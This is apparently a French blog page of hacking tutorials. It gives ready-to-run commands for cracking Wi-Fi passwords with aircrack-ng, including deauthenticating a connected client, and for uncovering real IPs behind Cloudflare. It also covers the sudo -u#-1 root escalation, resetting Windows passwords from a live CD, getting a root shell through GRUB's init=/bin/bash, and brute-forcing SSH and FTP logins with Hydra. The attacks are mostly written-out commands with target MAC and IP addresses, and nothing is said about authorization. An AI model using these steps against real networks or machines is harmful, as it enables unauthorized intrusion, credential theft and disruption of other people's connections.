Hacking

Air­crack-ng est une suite d’ou­tils per­met­tant de ren­trer dans un réseau wi-fi


On va com­men­cer par iden­ti­fier nos cartes réseaux qui sont capable de scan­ner du wi-fi, en soit notre carte WIFI. iwconfig

Ici je vois que le nom de ma carte réseau qui peut le faire est wlp3s0

Nous avons besoin de pas­ser notre carte  WIFI en mode moni­tor, lui per­met­tant d’é­cou­ter tout le traf­fic sur les réseaux WIFI.

airmon-ng start wlp3s0

Si on recheck notre carte réseau avec iwconfig , on voit que son nom à chan­ger wlp3s0mon à la fin pour indi­quer qu’elle est en mode ” monitor ”

On va com­men­cer à regar­der tout le traf­fic que la carte arrive à cap­tu­rer pour déter­mi­ner les réseaux.

airodump-ng wlp3s0mon


Ana­lyse de ce réseau

airodump-ng -c 6 --bssid 22:0F:47:7F:AD:ED -w oneplus7tpro wlp3s0mon

Des­crip­tion de la com­mande:
L’op­tion ‑c spé­ci­fie le chan­nel, récu­pé­ré pré­cé­dem­ment “CH”.
L’op­tion –bssid spé­ci­fie l’a­dresse MAC du rou­teur, récu­pé­ré pré­cé­dem­ment.
L’op­tion ‑w spé­ci­fie le nom du fichier, je prend pour habi­tude de mettre le même nom de fichier que celui du réseau.

On peut voir que j’ai déjà récu­pé­ré le Hand­shake, en haut à droite de la cap­ture d’é­cran. Si le hand­shake n’est pas récu­pé­ré, vous pou­vez le récu­pé­ré grace à l’é­tape sui­vante.
La caté­go­rie sta­tion montre qu’il y’a un équi­pe­ment de connec­té au point d’ac­cès wifi.

Envoi d’une demande de décon­nexion

Ceci est trans­pa­rent pour l’u­ti­li­sa­teur final. Elle per­met de récu­pé­rer un hand­shake plus rapi­de­ment.

aireplay-ng -0 2 -a 22:0F:47:7F:AD:ED -c D0:B1:28:89:54:E9 wlp3s0mon

Des­crip­tion de la com­mande:
L’op­tion ‑0 2 spé­ci­fie l’en­voi de deux demandes de décon­nexion.
L’op­tion ‑a spé­ci­fie l’a­dresse MAC du rou­teur ( BSSID ).
L’op­tion ‑c spé­ci­fie l’a­dresse MAC de l’ap­pa­reil actuel­le­ment connec­té.


Bru­te­force du mot de passe

air­crack-ng oneplus7tpro.cap dic­tion­naire

Clou­dUn­flare per­met le contour­ne­ment de Cloud­Flare et donne les vrais adresses IP ain­si que les sous-domaines des sites


Vous aurez besoin d’un compte au préa­lable sur https://completedns.com
L’ins­crip­tion est simple et rapide

Ins­tal­la­tion des dépen­dances

sudo apt install curl dnsutils whois

Clo­nage du dépôt

git clone https://github.com/greycatz/CloudUnflare.git

On se déplace dans le réper­toire

cd CloudUnflare

On modi­fie le script

vim cloudunflare.bash

Sur la ligne 4 ” CompleteDNS_Login=‘e‑mail|mot_de_passe ’ ”

On exé­cute le script

bash cloudunflare.bash

Une faille cri­tique est appa­ru dans Sudo, toutes les ver­sions de sudo en des­sous de 1.8.28 sont concer­nés.

Connaitre sa ver­sion de Sudo

sudo -V

Pour se connec­ter en tant que super-uti­li­sa­teur il suf­fit de taper

sudo -u#-1 -s

Mais il faut pour cela que l’u­ti­li­sa­teur soit spé­ci­fié dans le fichier sudoers en tant qu’in­ter­dic­tion de deve­nir root tel que:

theo­phile ALL=(ALL, !root) ALL

Pour accé­der à un sys­tème Win­dows, il existe dif­fé­rents moyens tel que Kon-Boot et Médi­cat.


Kon-Bootv2.5 ne fonc­tionne plus depuis la ver­sion 1903

Il suf­fi­sait de boot sur l’I­so et d’at­tendre cet écran


Médicat

Médi­cat est un cou­teau-suisse qui contient un mini-win­dows 10 en liveCD, et lubun­tu. Il contient beau­coup d’ou­tils qui per­mettent la répa­ra­tion d’or­di­na­teur. Ici nous allons voir com­ment réini­tia­li­ser le mot de passe.

On boot sur le LiveCD

On démarre le logi­ciel ” Reset User Pass­words ”

Ici l’u­ti­li­sa­teur est “Théo” et on appuie sur Reset Pass­word, on redé­marre et le tour est joué !

GRUB pour Grand Unified Boot­loa­der est un pro­gramme d’a­mor­çage. Il est exis­tant sur n’im­porte quelle machine à par­tir du moment ou un sys­tème d’ex­ploi­ta­tion de type Linux/Unix est pré­sent.


Démarrage du système d’exploitation:

Au démar­rage de la machine, après le pas­sage du BIOS, le grub appa­rait.

Posi­tion­nez le sélec­teur sur le sys­tème d’ex­ploi­ta­tion dont vous sou­hai­tez amor­cer. Édi­tez le en appuyant sur la touche “e”

On des­cend un peu dans le fichier de confi­gu­ra­tion, on change le ro par rw ( Read Only par Read Write, ce qui per­met d’a­voir les droits de lec­ture et d’é­cri­ture. On ajoute à la fin de cette ligne ” init=/bin/bash ” puis vous appuyez sur F10, le fichier de confi­gu­ra­tion se lance

On des­cend un peu dans le fichier de confi­gu­ra­tion, on change le ro par rw ( Read Only par Read Write ), ce qui per­met d’a­voir les droits de lec­ture et d’é­cri­ture. On ajoute à la fin de cette ligne ” init=/bin/bash ” puis vous appuyez sur F10, le fichier de confi­gu­ra­tion se lance.

Pour exé­cu­ter des com­mandes nor­ma­le­ments, vous allez peut-être avoir besoin de remon­ter vos par­ti­tions

mount -o remount,rw /

Vous avez main­te­nant accès à la machine avec les droits root !

Hydra est un logi­ciel per­for­mant qui per­met le brute-force de mot passe dans plu­sieurs caté­go­ries tel que le web, ftp etc…


Mise en place

Il uti­lise pour cela, un dic­tion­naire de mot de passe, vous pou­vez en trou­ver ici:
–> https://github.com/danielmiessler/SecLists
Pour les télé­char­ger :

git clone https://github.com/danielmiessler/SecLists.git

Installation

Le paquet est pré­sent de base dans les dépôts de Debian.

apt install hydra
apt install hydra-gtk                              ; Pré­sente l’in­ter­face Gra­phique

Utilisation

Il existe un script qui per­met d’exé­cu­ter hydra rapi­de­ment et sim­ple­ment en posant seule­ment quelques ques­tions néces­saires.

hydra-wizard

Les options avec hydra sont les sui­vantes:

  • -l si l’on connait le login ( user, admin, root … )
  • -p si l’on sou­haite essayer un mot de passe par­ti­cu­lier
  • -L Indique le che­min du dic­tion­naire de nom d’u­ti­li­sa­teur
  • -P Indique le che­min du dic­tion­naire de mot de passe
  • -M Indique le che­min du fichier conte­nant tous les hôtes Les ser­vices les plus com­muns pou­vant être atta­qués sont ssh, ftp, smb, pour voir la tota­li­té des ser­vices:
    hydra ‑h

Exemples:
hydra -L /home/theophile/Bureau/namelist.txt -P /home/theophile/Bureau/passlist.txt 192.168.43.198 ssh
hydra -l admin -p password -M /home/theophile/Bureau/target.txt ssh